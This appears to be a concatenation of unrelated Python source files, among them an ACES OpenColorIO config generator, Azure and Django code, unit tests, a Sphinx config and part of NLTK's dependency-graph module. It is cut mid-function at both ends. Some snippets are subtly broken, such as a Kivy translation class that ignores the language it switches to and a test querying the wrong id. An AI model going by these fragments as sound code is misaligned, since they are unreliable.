# "ACEStransformID", if it does not exist, there is a critical
# mismatch in the mapping with *aces-dev*.
aces_transform_id = transform_data['aces_transform_id']
filtered_ctl_transforms = [
ctl_transform for ctl_transform in ctl_transforms
if ctl_transform.aces_transform_id.aces_transform_id ==
aces_transform_id
]
ctl_transform = next(iter(filtered_ctl_transforms), None)
assert ctl_transform is not None, (
f'"aces-dev" has no transform with "{aces_transform_id}" '
f'ACEStransformID, please cross-check the '
f'"{config_mapping_file_path}" config mapping file and '
f'the "aces-dev" "CTL" transforms!')
transform_data['ctl_transform'] = ctl_transform
config_mapping[transform_data['builtin_transform_style']].append(
transform_data)
colorspaces = []
looks = []
displays, display_names = [], []
view_transforms, view_transform_names = [], []
shared_views = []
aces_family_prefix = 'CSC' if analytical else 'ACES'
scene_reference_colorspace = colorspace_factory(
f'{aces_family_prefix} - {ACES_CONFIG_REFERENCE_COLORSPACE}',
'ACES',
description=(
'The "Academy Color Encoding System" reference colorspace.'),
encoding='scene-linear')
display_reference_colorspace = colorspace_factory(
'CIE-XYZ-D65',
description='The "CIE XYZ (D65)" display connection colorspace.',
reference_space=ocio.REFERENCE_SPACE_DISPLAY)
raw_colorspace = colorspace_factory(
'Utility - Raw',
'Utility',
description='The utility "Raw" colorspace.',
is_data=True)
colorspaces += [
scene_reference_colorspace,
display_reference_colorspace,
raw_colorspace,
]
for style, transforms_data in config_mapping.items():
if transforms_data[0]['interface'] == 'ViewTransform':
view_transform = style_to_view_transform(style, [
transform_data['ctl_transform']
for transform_data in transforms_data
], describe)
view_transforms.append(view_transform)
view_transform_name = view_transform.getName()
view_transform_names.append(view_transform_name)
for transform_data in transforms_data:
display_style = transform_data[
'linked_display_colorspace_style']
display = style_to_display_colorspace(
display_style,
encoding=transform_data.get('encoding'),
categories=transform_data.get('categories'))
display_name = display.getName()
if display_name not in display_names:
displays.append(display)
display_names.append(display_name)
shared_views.append({
'display': display_name,
'view': view_transform_name,
'view_transform': view_transform_name,
})
else:
for transform_data in transforms_data:
ctl_transform = transform_data['ctl_transform']
if transform_data['interface'] == 'Look':
look = ctl_transform_to_look(
ctl_transform,
describe,
analytical=analytical,
forward_transform=create_builtin_transform(style),
process_space=scene_reference_colorspace.getName(),
)
looks.append(look)
else:
colorspace = ctl_transform_to_colorspace(
ctl_transform,
describe,
analytical=analytical,
to_reference=create_builtin_transform(style),
encoding=transform_data.get('encoding'),
categories=transform_data.get('categories'))
colorspaces.append(colorspace)
untonemapped_view_transform = view_transform_factory(
'Un-tone-mapped',
from_reference=ocio.BuiltinTransform(
'UTILITY - ACES-AP0_to_CIE-XYZ-D65_BFD'),
)
untonemapped_view_transform_name = untonemapped_view_transform.getName()
for display in display_names:
shared_views.append({
'display': display,
'view': untonemapped_view_transform_name,
'view_transform': untonemapped_view_transform_name,
})
data = ConfigData(
description=(
f'The "Academy Color Encoding System" (ACES) "Reference Config".'
f'\n\n'
f'This "OpenColorIO" config is a strict and quasi-analytical '
f'implementation of "aces-dev" and is designed as a reference for '
f'software developers. It is not a replacement for the previous '
f'"ACES" configs nor the "ACES Studio Config".'
f'\n\n'
f'Generated with "OpenColorIO-Config-ACES" {git_describe()} '
f'on the {datetime.now().strftime("%Y/%m/%d at %H:%M")}.'),
roles={
ocio.ROLE_COLOR_TIMING: f'{aces_family_prefix} - ACEScct',
ocio.ROLE_COMPOSITING_LOG: f'{aces_family_prefix} - ACEScct',
ocio.ROLE_DATA: 'Utility - Raw',
ocio.ROLE_DEFAULT: scene_reference_colorspace.getName(),
ocio.ROLE_INTERCHANGE_DISPLAY:
display_reference_colorspace.getName(),
ocio.ROLE_INTERCHANGE_SCENE: scene_reference_colorspace.getName(),
ocio.ROLE_REFERENCE: scene_reference_colorspace.getName(),
ocio.ROLE_RENDERING: f'{aces_family_prefix} - ACEScg',
ocio.ROLE_SCENE_LINEAR: f'{aces_family_prefix} - ACEScg',
},
colorspaces=colorspaces + displays,
looks=looks,
view_transforms=view_transforms + [untonemapped_view_transform],
shared_views=shared_views,
views=shared_views + [{
'display': display,
'view': 'Raw',
'colorspace': 'Utility - Raw'
} for display in display_names],
active_displays=display_names,
active_views=view_transform_names + ['Raw'],
file_rules=[{
'name': 'Default',
'colorspace': scene_reference_colorspace.getName()
}],
inactive_colorspaces=['CIE-XYZ-D65'],
default_view_transform=untonemapped_view_transform.getName(),
profile_version=2)
config = generate_config(data, config_name, validate)
if additional_data:
return config, data
else:
return config
if __name__ == '__main__':
import os
import opencolorio_config_aces
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
build_directory = os.path.join(opencolorio_config_aces.__path__[0], '..',
'build')
if not os.path.exists(build_directory):
os.makedirs(build_directory)
config, data = generate_config_aces(
config_name=os.path.join(build_directory,
'config-aces-reference.ocio'),
analytical=False,
additional_data=True)
|
from kivy.lang import Observable
import gettext
from constants import LOCALE_DIR
class Lang(Observable):
observers = []
lang = None
    def __init__(self, defaultlang, translate=None):
        super(Lang, self).__init__()
        self.ugettext = None
        self.lang = defaultlang
        self._translate = translate if translate is not None else gettext.gettext
self.switch_lang(self.lang)
def __call__(self, text):
return self._translate(text)
def fbind(self, name, func, *largs, **kwargs):
if name == "_":
self.observers.append((func, largs, kwargs))
else:
return super(Lang, self).fbind(name, func, *largs, **kwargs)
def funbind(self, name, func, *largs, **kwargs):
if name == "_":
key = (func, largs, kwargs)
if key in self.observers:
self.observers.remove(key)
else:
return super(Lang, self).funbind(name, func, *largs, **kwargs)
def switch_lang(self, lang):
        # get the right locales directory, and instantiate a gettext translation
locales = gettext.translation('Deep3DPhoto', LOCALE_DIR, languages=[lang])
self.ugettext = locales.gettext
# update all the kv rules attached to this text
for func, largs, kwargs in self.observers:
func(largs, None, None)
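# Illustrative usage (a sketch; it assumes compiled .mo catalogues for the 'Deep3DPhoto'
# domain exist under LOCALE_DIR for the requested languages):
#     _ = Lang('en')
#     print(_('Hello'))
#     _.switch_lang('fr')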
|
import inspect
import os
import sys
import unittest
from processflow.lib.mailer import Mailer
from processflow.lib.util import print_line
class TestMailer(unittest.TestCase):
def test_send_mail_valid(self):
print '\n'
print_line(
'---- Starting Test: {} ----'.format(inspect.stack()[0][3]), status='ok')
m = Mailer(
src='baldwin32@llnl.gov',
dst='baldwin32@llnl.gov')
ret = m.send(
status='THIS IS A TEST',
msg='THIS IS ONLY A TEST')
self.assertTrue(ret)
def test_send_mail_invalid(self):
print '\n'
print_line(
'---- Starting Test: {} ----'.format(inspect.stack()[0][3]), status='ok')
m = Mailer(
src='xxyyzz',
dst='xxyyzz')
ret = m.send(
status='THIS IS A TEST',
msg='THIS IS ONLY A TEST')
self.assertFalse(ret)
if __name__ == '__main__':
unittest.main()
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration import ContainerRegistryManagementClientConfiguration
from .operations import ConnectedRegistriesOperations
from .operations import ExportPipelinesOperations
from .operations import RegistriesOperations
from .operations import ImportPipelinesOperations
from .operations import Operations
from .operations import PipelineRunsOperations
from .operations import PrivateEndpointConnectionsOperations
from .operations import ReplicationsOperations
from .operations import ScopeMapsOperations
from .operations import TokensOperations
from .operations import WebhooksOperations
from .. import models
class ContainerRegistryManagementClient(object):
"""ContainerRegistryManagementClient.
:ivar connected_registries: ConnectedRegistriesOperations operations
:vartype connected_registries: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.ConnectedRegistriesOperations
:ivar export_pipelines: ExportPipelinesOperations operations
:vartype export_pipelines: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.ExportPipelinesOperations
:ivar registries: RegistriesOperations operations
:vartype registries: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.RegistriesOperations
:ivar import_pipelines: ImportPipelinesOperations operations
:vartype import_pipelines: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.ImportPipelinesOperations
:ivar operations: Operations operations
:vartype operations: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.Operations
:ivar pipeline_runs: PipelineRunsOperations operations
:vartype pipeline_runs: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.PipelineRunsOperations
:ivar private_endpoint_connections: PrivateEndpointConnectionsOperations operations
:vartype private_endpoint_connections: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.PrivateEndpointConnectionsOperations
:ivar replications: ReplicationsOperations operations
:vartype replications: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.ReplicationsOperations
:ivar scope_maps: ScopeMapsOperations operations
:vartype scope_maps: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.ScopeMapsOperations
:ivar tokens: TokensOperations operations
:vartype tokens: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.TokensOperations
:ivar webhooks: WebhooksOperations operations
:vartype webhooks: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.WebhooksOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: The Microsoft Azure subscription ID.
:type subscription_id: str
:param str base_url: Service URL
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = ContainerRegistryManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.connected_registries = ConnectedRegistriesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.export_pipelines = ExportPipelinesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.registries = RegistriesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.import_pipelines = ImportPipelinesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.operations = Operations(
self._client, self._config, self._serialize, self._deserialize)
self.pipeline_runs = PipelineRunsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.private_endpoint_connections = PrivateEndpointConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.replications = ReplicationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.scope_maps = ScopeMapsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.tokens = TokensOperations(
self._client, self._config, self._serialize, self._deserialize)
self.webhooks = WebhooksOperations(
self._client, self._config, self._serialize, self._deserialize)
async def _send_request(self, http_request: HttpRequest, **kwargs: Any) -> AsyncHttpResponse:
"""Runs the network request through the client's chained policies.
:param http_request: The network request you want to make. Required.
:type http_request: ~azure.core.pipeline.transport.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to True.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.pipeline.transport.AsyncHttpResponse
"""
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
http_request.url = self._client.format_url(http_request.url, **path_format_arguments)
stream = kwargs.pop("stream", True)
pipeline_response = await self._client._pipeline.run(http_request, stream=stream, **kwargs)
return pipeline_response.http_response
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "ContainerRegistryManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
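# Illustrative usage sketch (assumes the separate 'azure-identity' package; the credential
# and subscription id below are placeholders, not part of this module):
#     from azure.identity.aio import DefaultAzureCredential
#     async with ContainerRegistryManagementClient(
#             credential=DefaultAzureCredential(),
#             subscription_id="<subscription-id>") as client:
#         registries = [r async for r in client.registries.list()]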
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("CompareGeometryTest")
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.MessageLogger = cms.Service(
"MessageLogger",
statistics = cms.untracked.vstring('cout'),
categories = cms.untracked.vstring('MTDUnitTest',
'DD4hep_TestMTDIdealGeometry',
'DD4hep_TestMTDPath',
'DD4hep_TestMTDNumbering',
'DD4hep_TestMTDPosition'),
cout = cms.untracked.PSet(
threshold = cms.untracked.string('INFO'),
INFO = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
DD4hep_TestMTDIdealGeometry = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
DD4hep_TestMTDPath = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
DD4hep_TestMTDNumbering = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
DD4hep_TestMTDPosition = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
noLineBreaks = cms.untracked.bool(True)
),
mtdCommonDataDD4hep = cms.untracked.PSet(
INFO = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
noLineBreaks = cms.untracked.bool(True),
DEBUG = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
WARNING = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
ERROR = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
threshold = cms.untracked.string('INFO'),
MTDUnitTest = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
),
destinations = cms.untracked.vstring('cout',
'mtdCommonDataDD4hep')
)
process.DDDetectorESProducer = cms.ESSource("DDDetectorESProducer",
confGeomXMLFiles = cms.FileInPath('Geometry/MTDCommonData/data/dd4hep/cms-mtdD50-geometry.xml'),
appendToDataLabel = cms.string('MTD')
)
process.DDSpecParRegistryESProducer = cms.ESProducer("DDSpecParRegistryESProducer",
appendToDataLabel = cms.string('MTD')
)
process.testBTL = cms.EDAnalyzer("DD4hep_TestMTDIdealGeometry",
DDDetector = cms.ESInputTag('','MTD'),
ddTopNodeName = cms.untracked.string('BarrelTimingLayer'),
theLayout = cms.untracked.uint32(4)
)
process.testETL = cms.EDAnalyzer("DD4hep_TestMTDIdealGeometry",
DDDetector = cms.ESInputTag('','MTD'),
ddTopNodeName = cms.untracked.string('EndcapTimingLayer'),
theLayout = cms.untracked.uint32(4)
)
process.Timing = cms.Service("Timing")
process.p1 = cms.Path(process.testBTL+process.testETL)
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import unittest
import retworkx
class TestLongestPath(unittest.TestCase):
def test_linear(self):
"""Longest depth for a simple dag.
a
|
b
|\
c d
|\
e |
| |
f g
"""
dag = retworkx.PyDAG()
node_a = dag.add_node("a")
node_b = dag.add_child(node_a, "b", {})
node_c = dag.add_child(node_b, "c", {})
dag.add_child(node_b, "d", {})
node_e = dag.add_child(node_c, "e", {})
node_f = dag.add_child(node_e, "f", {})
dag.add_child(node_c, "g", {})
self.assertEqual(4, retworkx.dag_longest_path_length(dag))
self.assertEqual(
[node_a, node_b, node_c, node_e, node_f],
retworkx.dag_longest_path(dag),
)
def test_less_linear(self):
dag = retworkx.PyDAG()
node_a = dag.add_node("a")
node_b = dag.add_child(node_a, "b", {})
node_c = dag.add_child(node_b, "c", {})
node_d = dag.add_child(node_c, "d", {})
node_e = dag.add_child(node_d, "e", {})
dag.add_edge(node_a, node_c, {})
dag.add_edge(node_a, node_e, {})
dag.add_edge(node_c, node_e, {})
self.assertEqual(4, retworkx.dag_longest_path_length(dag))
self.assertEqual(
[node_a, node_b, node_c, node_d, node_e],
retworkx.dag_longest_path(dag),
)
def test_degenerate_graph(self):
dag = retworkx.PyDAG()
dag.add_node(0)
self.assertEqual(0, retworkx.dag_longest_path_length(dag))
self.assertEqual([0], retworkx.dag_longest_path(dag))
def test_empty_graph(self):
dag = retworkx.PyDAG()
self.assertEqual(0, retworkx.dag_longest_path_length(dag))
self.assertEqual([], retworkx.dag_longest_path(dag))
|
import logging
from mmcv.utils import get_logger
def get_root_logger(log_file=None, log_level=logging.INFO):
"""Get root logger.
Args:
log_file (str, optional): File path of log. Defaults to None.
log_level (int, optional): The level of logger.
Defaults to logging.INFO.
Returns:
:obj:`logging.Logger`: The obtained logger
"""
logger = get_logger(name='mmcap', log_file=log_file, log_level=log_level)
return logger
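# Illustrative usage (a sketch; the log file path is a placeholder):
#     logger = get_root_logger(log_file='work_dirs/run.log', log_level=logging.DEBUG)
#     logger.info('logger initialised')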
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Gabriel Fernandes <gabrielfernndss@gmail.com>
# Héricles Emanuel <hericles.me@gmail.com>
if __name__ == '__main__':
print('easter_egg!')
|
from django.db import models
from django.utils import timezone
category_choices = (
("Essential Services Pass", "Essential Services Pass"),
("Emergency Services Pass", "Emergency Services Pass"),
)
subcategory_choices = (
("ATM/Banking", "ATM/Banking"),
("Delivery Worker", "Delivery Worker"),
("Fruit/Vegetable Vendor","Fruit/Vegetable Vendor"),
("Govt Officials","Govt Officials"),
("Grocery Vendor","Grocery Vendor"),
("Milk Vendor","Milk Vendor"),
("Health Worker","Health Worker"),
("IT/Tele Communication","IT/Tele Communication"),
("Municipal Services","Municipal Services"),
("Power/Electricity","Power/Electricity"),
("Sanitation","Sanitation"),
("Businessman","Businessman"),
)
# Create your models here.
class PassModel(models.Model):
district=models.CharField(max_length=20,null=True)
name=models.CharField(max_length=200,null=True)
email=models.CharField(max_length=200,null=True)
vehiclenumber=models.CharField(max_length=200,null=True)
phonenumber=models.CharField(max_length=10,null=True)
aadharcardnumber=models.CharField(max_length=12,null=True)
address=models.CharField(max_length=200,null=True)
reason=models.CharField(max_length=200,null=True)
issuedate=models.DateTimeField(default=timezone.now)
passcategory=models.CharField(max_length=30,choices = category_choices)
subcategory=models.CharField(max_length=30,choices = subcategory_choices)
attachphoto=models.ImageField(upload_to='profile_pics')
attachidproof=models.ImageField(upload_to='id_proof')
uniquenumber=models.CharField(max_length=10000,default=201301)
checked=models.BooleanField(default=0)
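# Illustrative ORM usage (a sketch only; all field values below are placeholders):
#     PassModel.objects.create(
#         district="Agra", name="A. Kumar", phonenumber="9999999999",
#         passcategory="Essential Services Pass", subcategory="Health Worker",
#         reason="Hospital duty")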
|
# -*- coding: utf-8 -*-
import doctest
from datetime import date
import scippnexus
html_show_sourcelink = True
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.mathjax',
'sphinx.ext.napoleon',
'sphinx_autodoc_typehints',
'sphinx_copybutton',
'nbsphinx',
]
autodoc_type_aliases = {
'VariableLike': 'VariableLike',
'MetaDataMap': 'MetaDataMap',
'array_like': 'array_like',
}
rst_epilog = f"""
.. |SCIPP_RELEASE_MONTH| replace:: {date.today().strftime("%B %Y")}
.. |SCIPP_VERSION| replace:: {scippnexus.__version__}
""" # noqa: E501
intersphinx_mapping = {
'python': ('https://docs.python.org/3', None),
'numpy': ('https://numpy.org/doc/stable/', None),
'scipp': ('https://scipp.github.io/', None),
'scipy': ('https://docs.scipy.org/doc/scipy/', None),
'xarray': ('https://xarray.pydata.org/en/stable/', None)
}
# autodocs includes everything, even irrelevant API internals. autosummary
# looks more suitable in the long run when the API grows.
# For a nice example see how xarray handles its API documentation.
autosummary_generate = True
napoleon_google_docstring = False
napoleon_numpy_docstring = True
napoleon_use_param = True
napoleon_use_rtype = False
napoleon_preprocess_types = True
napoleon_type_aliases = {
# objects without namespace: scipp
"DataArray": "~scipp.DataArray",
"Dataset": "~scipp.Dataset",
"Variable": "~scipp.Variable",
# objects without namespace: numpy
"ndarray": "~numpy.ndarray",
}
typehints_defaults = 'comma'
typehints_use_rtype = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
html_sourcelink_suffix = '' # Avoid .ipynb.txt extensions in sources
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'scippnexus'
copyright = u'2022 Scipp contributors'
author = u'Scipp contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u''
# The full version, including alpha/beta/rc tags.
release = u''
warning_is_error = True
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', '**.ipynb_checkpoints']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_book_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
"logo_only": True,
"repository_url": "https://github.com/scipp/scippnexus",
"repository_branch": "main",
"path_to_docs": "docs",
"use_repository_button": True,
"use_issues_button": True,
"use_edit_page_button": True,
"show_toc_level": 2, # Show subheadings in secondary sidebar
}
html_logo = "_static/logo.png"
html_favicon = "_static/favicon.ico"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'scippnexusdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'scipp.tex', u'scipp Documentation', u'Simon Heybrock', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, 'scipp', u'scipp Documentation', [author], 1)]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'scipp', u'scipp Documentation', author, 'scipp',
'One line description of project.', 'Miscellaneous'),
]
# -- Options for Matplotlib in notebooks ----------------------------------
nbsphinx_execute_arguments = [
"--Session.metadata=scipp_docs_build=True",
]
# -- Options for doctest --------------------------------------------------
doctest_global_setup = '''
import numpy as np
import scipp as sc
'''
# Using normalize whitespace because many __str__ functions in scipp produce
# extraneous empty lines and it would look strange to include them in the docs.
doctest_default_flags = doctest.ELLIPSIS | doctest.IGNORE_EXCEPTION_DETAIL | \
doctest.DONT_ACCEPT_TRUE_FOR_1 | \
doctest.NORMALIZE_WHITESPACE
# -- Options for linkcheck ------------------------------------------------
linkcheck_ignore = [
# Specific lines in Github blobs cannot be found by linkcheck.
r'https?://github\.com/.*?/blob/[a-f0-9]+/.+?#',
]
|
# Generated by Django 2.2 on 2019-04-18 13:14
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("images", "0001_initial"),
]
operations = [
migrations.AddField(
model_name="image",
name="thumbnail",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="container",
to="images.ImageFile",
),
),
]
|
import unittest
from app.main.models import Pitches
from app import db
class PitchesModelTest(unittest.TestCase):
def setUp(self):
        self.new_pitch = Pitches(pitch='new', comment='I love darkness', category='sports', user_id=123)
def tearDown(self):
Pitches.query.delete()
    def test_init(self):
        self.assertEqual(self.new_pitch.pitch, 'new')
        self.assertEqual(self.new_pitch.comment, 'I love darkness')
        self.assertEqual(self.new_pitch.category, 'sports')
        self.assertEqual(self.new_pitch.user_id, 123)
def test_save_pitch(self):
self.new_pitch.save_pitch()
self.assertTrue(len(Pitches.query.all())>0)
def test_get_pitch_by_id(self):
        self.new_pitch.save_pitch()
got_pitch = Pitches.get_pitch(12345)
self.assertTrue(len(got_pitch) == 1)
|
string = input()
string_length = len(string)
print(string_length)
string = input()
if len(string) < 5:
print("Ошибка! Введите больше пяти символов!")
string = input()
if not string:
print("Ошибка! Введите хоть что-нибудь!")
string = input()
if len(string) == 0:
print("Ошибка! Введите хоть что-нибудь!")
|
# Natural Language Toolkit: Dependency Grammars
#
# Copyright (C) 2001-2021 NLTK Project
# Author: Jason Narad <jason.narad@gmail.com>
# Steven Bird <stevenbird1@gmail.com> (modifications)
#
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
#
"""
Tools for reading and writing dependency trees.
The input is assumed to be in Malt-TAB format
(http://stp.lingfil.uu.se/~nivre/research/MaltXML.html).
"""
from collections import defaultdict
from itertools import chain
from pprint import pformat
import subprocess
import warnings
from nltk.tree import Tree
#################################################################
# DependencyGraph Class
#################################################################
class DependencyGraph:
"""
A container for the nodes and labelled edges of a dependency structure.
"""
def __init__(
self,
tree_str=None,
cell_extractor=None,
zero_based=False,
cell_separator=None,
top_relation_label="ROOT",
):
"""Dependency graph.
We place a dummy `TOP` node with the index 0, since the root node is
often assigned 0 as its head. This also means that the indexing of the
nodes corresponds directly to the Malt-TAB format, which starts at 1.
        If zero_based is True, Malt-TAB-like input with node numbers starting
        at 0 and the root node assigned -1 (as produced by, e.g., zpar) is
        expected.
:param str cell_separator: the cell separator. If not provided, cells
are split by whitespace.
:param str top_relation_label: the label by which the top relation is
          identified, for example, `ROOT`, `null` or `TOP`.
"""
self.nodes = defaultdict(
lambda: {
"address": None,
"word": None,
"lemma": None,
"ctag": None,
"tag": None,
"feats": None,
"head": None,
"deps": defaultdict(list),
"rel": None,
}
)
self.nodes[0].update({"ctag": "TOP", "tag": "TOP", "address": 0})
self.root = None
if tree_str:
self._parse(
tree_str,
cell_extractor=cell_extractor,
zero_based=zero_based,
cell_separator=cell_separator,
top_relation_label=top_relation_label,
)
def remove_by_address(self, address):
"""
Removes the node with the given address. References
to this node in others will still exist.
"""
del self.nodes[address]
def redirect_arcs(self, originals, redirect):
"""
Redirects arcs to any of the nodes in the originals list
to the redirect node address.
"""
for node in self.nodes.values():
new_deps = []
for dep in node["deps"]:
if dep in originals:
new_deps.append(redirect)
else:
new_deps.append(dep)
node["deps"] = new_deps
def add_arc(self, head_address, mod_address):
"""
Adds an arc from the node specified by head_address to the
node specified by the mod address.
"""
relation = self.nodes[mod_address]["rel"]
self.nodes[head_address]["deps"].setdefault(relation, [])
self.nodes[head_address]["deps"][relation].append(mod_address)
# self.nodes[head_address]['deps'].append(mod_address)
def connect_graph(self):
"""
Fully connects all non-root nodes. All nodes are set to be dependents
of the root node.
"""
for node1 in self.nodes.values():
for node2 in self.nodes.values():
if node1["address"] != node2["address"] and node2["rel"] != "TOP":
relation = node2["rel"]
node1["deps"].setdefault(relation, [])
node1["deps"][relation].append(node2["address"])
# node1['deps'].append(node2['address'])
def get_by_address(self, node_address):
"""Return the node with the given address."""
return self.nodes[node_address]
def contains_address(self, node_address):
"""
Returns true if the graph contains a node with the given node
address, false otherwise.
"""
return node_address in self.nodes
def to_dot(self):
"""Return a dot representation suitable for using with Graphviz.
>>> dg = DependencyGraph(
... 'John N 2\\n'
... 'loves V 0\\n'
... 'Mary N 2'
... )
>>> print(dg.to_dot())
digraph G{
edge [dir=forward]
node [shape=plaintext]
<BLANKLINE>
0 [label="0 (None)"]
0 -> 2 [label="ROOT"]
1 [label="1 (John)"]
2 [label="2 (loves)"]
2 -> 1 [label=""]
2 -> 3 [label=""]
3 [label="3 (Mary)"]
}
"""
# Start the digraph specification
s = "digraph G{\n"
s += "edge [dir=forward]\n"
s += "node [shape=plaintext]\n"
# Draw the remaining nodes
for node in sorted(self.nodes.values(), key=lambda v: v["address"]):
s += '\n%s [label="%s (%s)"]' % (
node["address"],
node["address"],
node["word"],
)
for rel, deps in node["deps"].items():
for dep in deps:
if rel is not None:
s += '\n%s -> %s [label="%s"]' % (node["address"], dep, rel)
else:
s += "\n%s -> %s " % (node["address"], dep)
s += "\n}"
return s
def _repr_svg_(self):
"""Show SVG representation of the transducer (IPython magic).
>>> dg = DependencyGraph(
... 'John N 2\\n'
... 'loves V 0\\n'
... 'Mary N 2'
... )
>>> dg._repr_svg_().split('\\n')[0]
'<?xml version="1.0" encoding="UTF-8" standalone="no"?>'
"""
dot_string = self.to_dot()
try:
process = subprocess.Popen(
["dot", "-Tsvg"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
)
except OSError as e:
raise Exception("Cannot find the dot binary from Graphviz package") from e
out, err = process.communicate(dot_string)
if err:
raise Exception(
"Cannot create svg representation by running dot from string: {}"
"".format(dot_string)
)
return out
def __str__(self):
return pformat(self.nodes)
def __repr__(self):
